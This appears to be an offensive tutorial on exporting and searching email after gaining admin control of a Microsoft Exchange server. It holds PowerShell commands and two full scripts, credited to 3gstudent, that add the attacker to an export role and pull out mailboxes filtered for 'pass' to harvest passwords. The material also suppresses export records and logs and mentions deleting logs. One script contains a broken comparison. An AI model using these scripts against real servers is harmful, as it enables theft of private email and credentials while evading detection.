Exchange Export email methods

Introduction

Assuming that you have obtained the administrative rights of the Exchange server, what you need to do now is to search and export the emails in the server, so as to obtain more critical and sensitive information, such as looking for passwords and personal information

Basic information Acquisition

Get your tar account

Get-MailboxStatistics -Identity yangsir |fl

Manager

PSSession

$User = "rootkit.org\administrator"
$Pass = ConvertTo-SecureString -AsPlainText admin!@#45 -Force
$Credential = New-Object System.Management.Automation.PSCredential -ArgumentList $User,$Pass
$Session = New-PSSession -ConfigurationName Microsoft.Exchange -ConnectionUri http://OWA2013/PowerShell/ -Authentication Kerberos -Credential $Credential
Import-PSSession $Session -AllowClobber

session address must be fqdn, if not fqdn will wrong like this

get pssession info：
Get-PSSession

stop PSSession：
Remove-PSSession $Session

get account：
Get-Mailbox

Use exchange

add the manager unit
Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn;

MSDN info

https://docs.microsoft.com/en-us/powershell/module/exchange/?view=exchange-ps

Get all account

Get all mailbox information, including the number of messages, the last time to access the mailbox

Get all ou

Get-OrganizationalUnit

Get the follow log

system dir 
%ExchangeInstallPath%TransportRoles\Logs\MessageTracking

Gets the sender information of the specified sender

See yangsir@rootkit.org for information about all emails sent from 18:00, 28 July 2021 to present

Get-MessageTrackingLog -Start "07/28/2019 18:00:00" -Sender "yangsir@rootkit.org"

same way to the example

Get more easy info

Get-MessageTrackingLog -EventID send -Start "07/28/2019 18:00:00" -Sender "yangsir@rootkit.org"

Export

PSSession

Need connection

Adds the current user to the Mailbox Import Expor role group

Export special user

$User = "yangsir"
New-MailboxexportRequest -mailbox $User -FilePath ("\\localhost\c$\daochu\"+$User+".pst")

this way to export the daochu dir

Export the key from email

$User = "yangsir"
New-MailboxexportRequest -mailbox $User -ContentFilter {(body -like "*pass*")} -FilePath ("\\localhost\c$\daochu1\"+$User+".pst")

Export all email

Get-Mailbox -OrganizationalUnit Users -Resultsize unlimited |%{New-MailboxexportRequest -mailbox $_.name -FilePath ("\\localhost\c$\all\"+($_.name)+".pst")}

Export log

get log 

you can use this way to not make log

del all log

PS AUTO

follow from 3gstudent 

function UsePSSessionToExportMailfromExchange
{
#Requires -Version 2.0
<#
.SYNOPSIS
This script will export the mail(.pst) from the Exchange server.
First it will use PSSession to connect the Exchange server.
Then it'll check the user's privilege.
If the user is not in the "Mailbox Import Export",the script will add the user to it and reconnect the Exchange server.
Next it will export the mail and save it.
At last it will remove the user from the group and remove the PSSession.
Author: 3gstudent
.PARAMETER User
The user to use.
In general, you can choose the account in the domain admins.
.PARAMETER Password
The password of the user.
.PARAMETER MailBox
The mail you want to export.
.PARAMETER ExportPath
The export path of the mail.
.PARAMETER ConnectionUri
The uri of the Exchange server.
Eg.
    http://Exchange01.test.com/PowerShell/
    
.PARAMETER $Filter
The search filter of the mail.
.EXAMPLE
PS C:\> UsePSSessionToExportMailfromExchange -User "administrator" -Password "DomainAdmin123!" -MailBox "test1" -ExportPath "\\Exchange01.test.com\c$\test\" -ConnectionUri "http://Exchange01.test.com/PowerShell/" -Filter "{`"(body -like `"*pass*`")`"}"
#>
 	param (
        [Parameter(Mandatory = $True)]
		[string]$User,
        [Parameter(Mandatory = $True)]
		[string]$Password,
        [Parameter(Mandatory = $True)]
		[string]$MailBox,
        [Parameter(Mandatory = $True)]
		[string]$ExportPath,
        [Parameter(Mandatory = $True)]
		[string]$ConnectionUri,
        [Parameter(Mandatory = $True)]
		[string]$Filter
	)
    $Flag = 0
    Write-Host "[>] Start to Import-PSSession" 
    #Import-PSSession
    $Pass = ConvertTo-SecureString -AsPlainText $Password -Force
    $Credential = New-Object System.Management.Automation.PSCredential -ArgumentList $User,$Pass
    $Session = New-PSSession -ConfigurationName Microsoft.Exchange -ConnectionUri $ConnectionUri -Authentication Kerberos -Credential $Credential
    Import-PSSession $Session -AllowClobber| Out-Null

    Write-Host "[>] Start to check user"
    #check user
    if(Get-ManagementRoleAssignment ("Mailbox Import Export-"+$User) -ErrorAction SilentlyContinue) 
    {
    	Write-Host "[!] The specified user already exists.No need to add it to the group"
	$Flag = 1
    }
    else
    {
    	Write-Host "[+] Start to add user" 
    	#Add user
    	New-ManagementRoleAssignment –Role "Mailbox Import Export" –User $User| Out-Null
    	Write-Host "[>] Start to reconnect"
    	#Reconnect
    	Remove-PSSession $Session
    	$Session = New-PSSession -ConfigurationName Microsoft.Exchange -ConnectionUri $ConnectionUri -Authentication Kerberos -Credential $Credential
    	Import-PSSession $Session -AllowClobber| Out-Null
    }
    Write-Host "[+] Start to export mail" 
    #Export mail and do not save the export request
    New-MailboxexportRequest -mailbox $MailBox -ContentFilter $Filter -FilePath ($ExportPath+$MailBox+".pst") -CompletedRequestAgeLimit 0
    
    if ($Flag = 0)
    {
    	Write-Host "[>] Start to remove user"
    	#Remove user
    	Get-ManagementRoleAssignment ("Mailbox Import Export-"+$User) |Remove-ManagementRoleAssignment -Confirm:$false
    }
    
    Write-Host "[>] Start to Remove-PSSession"
    #Remove PSSession
    Remove-PSSession $Session
    Write-Host "[+] All done."
}

Use exchange

Export special user

Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn;
$User = "yangsir"
New-MailboxexportRequest -mailbox $User -FilePath ("\\localhost\c$\daochu\"+$User+".pst")

PS AUTO

same way from the 3gstudent

function DirectExportMailfromExchange
{
#Requires -Version 2.0
<#
.SYNOPSIS
This script will export the mail(.pst) from the Exchange server.
The script needs to be executed on the Exchange server.

Author: 3gstudent

.PARAMETER MailBox
The mail you want to export.

.PARAMETER ExportPath
The export path of the mail.
 
.PARAMETER $Filter
The search filter of the mail.

.PARAMETER $Version
The version of the Exhange.
It can be 2007,2010,2013 and 2016.

.EXAMPLE
PS C:\> DirectExportMailfromExchange -MailBox "test1" -ExportPath "\\localhost\c$\test\" -Filter "{`"(body -like `"*pass*`")`"}" -Version 2013
#>
 	param (
        [Parameter(Mandatory = $True)]
		[string]$MailBox,
        [Parameter(Mandatory = $True)]
		[string]$ExportPath,
        [Parameter(Mandatory = $True)]
		[string]$Filter,
        [Parameter(Mandatory = $True)]
		[string]$Version
	)

    Write-Host "[>] Start to add PSSnapin" 
    if ($Version -eq 2007)
    {
        Add-PSSnapin Microsoft.Exchange.Management.PowerShell.Admin;
    }

    elseif ($Version -eq 2010)
    {
        Add-PSSnapin Microsoft.Exchange.Management.PowerShell.E2010;
    }

    else
    {
        
        Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn;
    }
  
    Write-Host "[+] Start to export mail" 
    #Export mail and do not save the export request
    New-MailboxexportRequest -mailbox $MailBox -ContentFilter {(body -like "*pass*")} -FilePath ($ExportPath+$MailBox+".pst") -CompletedRequestAgeLimit 0
    Write-Host "[+] All done."
}

Search

PSSession

the same way to export

Use exchange

all tar to find the key
Get-Mailbox|Search-Mailbox -SearchQuery "*pass*" -EstimateResultOnly

all tar to find the key to export tar user dir
Get-Mailbox|Search-Mailbox -SearchQuery "*pass*" -TargetMailbox "user" -TargetFolder "out" -LogLevel Suppress

tar user to find the key to export tar user dir
Search-Mailbox -Identity yangsir -SearchQuery "*pass*" -TargetMailbox "user" -TargetFolder "out" -LogLevel Suppress

ECP

let tar user into the Discovery Management group

then go to this module